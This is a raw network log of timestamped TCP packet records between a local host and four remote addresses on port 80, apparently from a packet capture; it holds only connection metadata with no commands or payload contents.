Sep 21, 2024 14:48:10.025907040 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025907993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025919914 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025928974 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025960922 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025963068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026007891 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026020050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026031017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026041985 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026051998 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026053905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026066065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026074886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026078939 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026082039 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026109934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026133060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026137114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026144981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026155949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026168108 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026174068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026177883 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026190042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026197910 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026201963 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026202917 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026215076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026232958 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026238918 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026245117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026252985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026283026 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026418924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026432037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026468039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026499987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026503086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026513100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026524067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026535034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026541948 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026547909 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026560068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026571035 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026571989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026581049 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026602983 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026623011 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026659012 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026669979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026679993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026699066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026710033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026719093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026721001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026734114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.026745081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026757956 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026758909 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026761055 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026771069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026777029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.026803970 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026824951 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.026834965 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.026873112 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027081013 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027092934 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027111053 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027122021 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027128935 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027132988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027144909 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027149916 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027156115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027168989 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027179003 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027180910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027192116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027203083 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027204990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027219057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027229071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027230978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027244091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027256966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027266979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027268887 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027277946 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027282000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027293921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027302027 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027307034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027318001 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027329922 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027333975 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027343035 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027367115 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027367115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027396917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027564049 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027575970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027586937 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027597904 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027607918 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027611971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027622938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027635098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027638912 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027667046 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027667046 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027694941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027709961 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027724028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027734041 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027749062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027764082 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027765989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027775049 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027786970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027786970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027800083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027812004 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027821064 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027822018 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027822971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027837038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.027838945 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027848005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027848959 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027861118 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027863026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027872086 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027880907 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027884960 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.027887106 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.027901888 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.027931929 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028110027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028121948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028132915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028143883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028148890 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028157949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028168917 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028178930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028181076 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028184891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028194904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028206110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028212070 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028213024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028249025 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028280020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028295040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028305054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028320074 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028327942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028341055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028346062 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028354883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028364897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.028376102 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028379917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028388023 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028388977 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028399944 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028410912 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028424025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028426886 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028429031 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.028435946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028449059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028459072 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028461933 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028476954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028480053 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028489113 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028501987 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028506041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028515100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028527975 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028534889 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028541088 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.028547049 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028565884 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028594971 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.028990030 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029001951 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029014111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029026031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.029031992 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.029037952 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029048920 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029061079 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029063940 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.029079914 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029093027 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029094934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.029097080 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.029103994 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.029107094 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.029143095 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.053379059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053406000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053417921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053430080 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053443909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053453922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053462029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053488970 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053499937 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053502083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053515911 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053528070 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053529978 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053546906 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053549051 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053572893 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053590059 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053620100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053632021 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053642035 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053654909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053666115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053677082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053689957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053697109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053703070 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053718090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053745031 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053839922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053853035 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.053883076 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.053898096 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.057446957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057471991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057483912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057531118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.057564020 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.057566881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057579041 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057589054 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057602882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057610035 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.057615995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.057648897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.057676077 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.060859919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.060909986 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.060916901 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.060923100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.060960054 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.060988903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061001062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061012030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061032057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061041117 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061044931 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061058998 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061077118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061108112 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061120987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061132908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061145067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061157942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061165094 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061207056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061219931 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061230898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061238050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061242104 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061253071 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061264992 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061264992 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061276913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061284065 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061312914 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061315060 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061333895 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061362028 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061454058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061465979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061477900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061487913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061500072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061500072 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061513901 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061526060 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061527014 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061537981 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061544895 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061549902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061563015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061574936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061577082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061585903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061600924 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061619043 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061641932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061693907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061706066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061716080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061741114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061762094 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061770916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061784029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061794996 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061806917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061813116 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061819077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061827898 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061830997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061845064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061846972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061876059 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061893940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061928034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061940908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061952114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061971903 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061973095 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061983109 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.061985970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.061995983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062007904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062021971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062031031 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062061071 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062203884 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062216043 CEST	80	49711	147.45.44.104	192.168.2.9
